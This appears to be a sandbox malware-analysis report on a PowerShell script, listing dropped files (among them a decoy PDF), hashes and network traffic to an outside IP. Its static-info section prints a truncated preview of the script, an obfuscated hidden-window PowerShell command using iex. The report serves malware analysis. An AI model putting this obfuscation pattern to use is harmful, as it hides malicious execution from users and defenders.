                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hm1hssfr.ndq.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lixrgrhk.k5w.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 06-48-04-842.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                      Category:dropped
                                                                                      Size (bytes):16525
                                                                                      Entropy (8bit):5.338264912747007
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                                      MD5:128A51060103D95314048C2F32A15C66
                                                                                      SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                                      SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                                                      SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                                      Malicious:false
                                                                                      Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):15114
                                                                                      Entropy (8bit):5.376811207828648
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:VMgIZdcuIoXfLXzvfGgsPAihbOuRqGqxRXnoh1jrbe1u+syVeXJEChRYRJIJHZ5L:+Lw
                                                                                      MD5:17374E6F0F2A3B069C6E1A3EDC90A4BA
                                                                                      SHA1:75B5957EC806749DE84359DEDAB998509F022DA5
                                                                                      SHA-256:5AAAA5A593E554BB800F9FC92068D44623FFA6027977B6411C9632D893048228
                                                                                      SHA-512:F111085788C679887F5915021ABBF70E1B75EA25014E6B43F2C5F2FB20F74EDC88403CA320E1BB48D1501BE0212D2766C4A23404244CEC2086889143DD4B92E7
                                                                                      Malicious:false
                                                                                      Preview:SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:855-0500 ThreadID=5976 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:858-0500 ThreadID=5976 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:858-0500 ThreadID=5976 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:859-0500 ThreadID=5976 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:859-0500 ThreadID=5976 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):29752
                                                                                      Entropy (8bit):5.405982353124853
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbi+ggcPgViP/yv+Bev+gnOziUcq:V3fOCIdJDeJH4
                                                                                      MD5:6F6D12BFD519F7F67C51E8F60561EC8E
                                                                                      SHA1:82A9B64B74397773A7C8CE78207FB62EC49C2DEB
                                                                                      SHA-256:F9B7C74D7C7FE43C5FE35580EEC422CC1244302E95F7FF2661777B35A774C544
                                                                                      SHA-512:62476E0494B59DA87849BD58E9347E02261EEA1C2D177B64613C9662CBF91EF7E8AEF656CF4C6CB3CB3B611FA595F65F26B9B027B84CE874F98ADA6D1DDDFCED
                                                                                      Malicious:false
                                                                                      Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\39d4de50-d4ca-4ba6-902f-c2c87ee9595f.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                      Category:dropped
                                                                                      Size (bytes):758601
                                                                                      Entropy (8bit):7.98639316555857
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                      MD5:3A49135134665364308390AC398006F1
                                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                      Malicious:false
                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\43a6f345-6a88-494a-aab1-e7a2c7230999.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                      Category:dropped
                                                                                      Size (bytes):386528
                                                                                      Entropy (8bit):7.9736851559892425
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                      Malicious:false
                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\ba33c810-09d9-45ba-98a1-ef86d78531b7.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                      Category:dropped
                                                                                      Size (bytes):1419751
                                                                                      Entropy (8bit):7.976496077007677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/M7ouWLYZwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLYZwZGuGZn3mlind9i4ufFXpAXkru
                                                                                      MD5:EC8D4FAB55F24C0E344D263724846C4A
                                                                                      SHA1:5444D90F86D68A23AF7FB5434DEAE740D57D0312
                                                                                      SHA-256:E489C11D38BFF8F1F51351BAEBEE9F723A5C036DA0B0CB9C82306251017054EE
                                                                                      SHA-512:21018FD299944987654C202779C8E0185815868DE7179B814F145573EE8D45ACC33CA7E008CB23774C473DD7939E9D7D7C2E5A14E31D5EC62F7BFFDBBAB41F9A
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\db5002a9-484a-42fc-93d0-def04595db91.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                      Category:dropped
                                                                                      Size (bytes):1407294
                                                                                      Entropy (8bit):7.97605879016224
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ4ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ48
                                                                                      MD5:1D64D25345DD73F100517644279994E6
                                                                                      SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                                                                                      SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                                                                                      SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6224
                                                                                      Entropy (8bit):3.7326406163449413
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:H2Q3CzTbkvhkvCCtCEW1fIHgsFEW1fwHgsj:H2N7CzlsFzZsj
                                                                                      MD5:156BBD89DFFF3818460CEBE24B5742CF
                                                                                      SHA1:8B3DB4340335BFA163B9A9136F2DB87C41D9354A
                                                                                      SHA-256:4996C3146F0DEEA5E2FD4701F578ED054CDD1A0E63F8C79FEFC1590B5CBD47EF
                                                                                      SHA-512:2A244AF517A955C3CA18F8C74B289BE1EE67D0A2C11C0AACFEBCAB7A3FA271E3E8BBACB361EADCCF6A6373A3421056250BAB5BC03180CE099320C442E3CF7205
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ...J.S.....'..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S........R....5..R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.]...........................^.A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW<2.Y.]..../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.]....2......................^..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.]....u...........

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q5I5BM40XFEROMCBUJON.temp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6224
                                                                                      Entropy (8bit):3.7326406163449413
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:H2Q3CzTbkvhkvCCtCEW1fIHgsFEW1fwHgsj:H2N7CzlsFzZsj
                                                                                      MD5:156BBD89DFFF3818460CEBE24B5742CF
                                                                                      SHA1:8B3DB4340335BFA163B9A9136F2DB87C41D9354A
                                                                                      SHA-256:4996C3146F0DEEA5E2FD4701F578ED054CDD1A0E63F8C79FEFC1590B5CBD47EF
                                                                                      SHA-512:2A244AF517A955C3CA18F8C74B289BE1EE67D0A2C11C0AACFEBCAB7A3FA271E3E8BBACB361EADCCF6A6373A3421056250BAB5BC03180CE099320C442E3CF7205
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ...J.S.....'..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S........R....5..R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.]...........................^.A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW<2.Y.]..../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.]....2......................^..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.]....u...........

                                                                                      C:\Users\user\Desktop\List of Required items and services.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                      Category:dropped
                                                                                      Size (bytes):871324
                                                                                      Entropy (8bit):7.827941732382635
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                      MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                      SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                      SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                      SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                      Malicious:false
                                                                                      Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):55
                                                                                      Entropy (8bit):4.306461250274409
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                      Malicious:false
                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:ASCII text, with very long lines (841), with no line terminators
                                                                                      Entropy (8bit):5.406519064537952
                                                                                      TrID:
                                                                                        File name:1M1QoJF40r.ps1
                                                                                        File size:841 bytes
                                                                                        MD5:038e1ec475d16db5d36b71e12dbc5874
                                                                                        SHA1:a5b86b7e287cc13b3a6620eeac6ae6664949f68d
                                                                                        SHA256:a63c8dacfe1337cf5d0654c19c97c35068cd6a257220ef56d3a51402e4f83862
                                                                                        SHA512:5fccd228da3a3c4c7815e4c278d0f657d1470c3c00b59cc5b99ae550e88d067498873eb073fab9331914c5ab9ab44721b78e2801b1071adfe386f7e34b082e42
                                                                                        SSDEEP:24:X53Qr1qIjWIr0L+Nl7QWAa6Kz8Wjzo2bry:pgBzKIrzGKz8WPoWy
                                                                                        TLSH:E90152CDB5C356EB6740F89550CD863D3237C229B4E600E1B2B9460F21ACB3C0E81736
                                                                                        File Content Preview:powershell -win hidden $n31j81=iex($('[Environment]::GetEcmts'''.Replace('cmt','nvironmentVariable(''public'') + ''\\uipw9v.vb')));$flol=iex($('[Environment]::GetEcmts'''.Replace('cmt','nvironmentVariable(''public'') + ''\\zb6.vb')));function getit([strin

                                                                                        File Icon

                                                                                        Icon Hash:3270d6baae77db44

                                                                                        Network Behavior

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 19, 2024 12:47:58.833446980 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:47:58.833512068 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:47:58.833651066 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:47:58.843811035 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:47:58.843831062 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.095695972 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.095808029 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.097599030 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.097614050 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.097845078 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.104995966 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.151326895 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.539187908 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.586987972 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.659306049 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.659331083 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.659358978 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.659377098 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.659384012 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.659390926 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.659416914 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.659440041 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.659446001 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.659476995 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.770440102 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.770467997 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.770553112 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.770632029 CET44349710107.161.23.150192.168.2.6
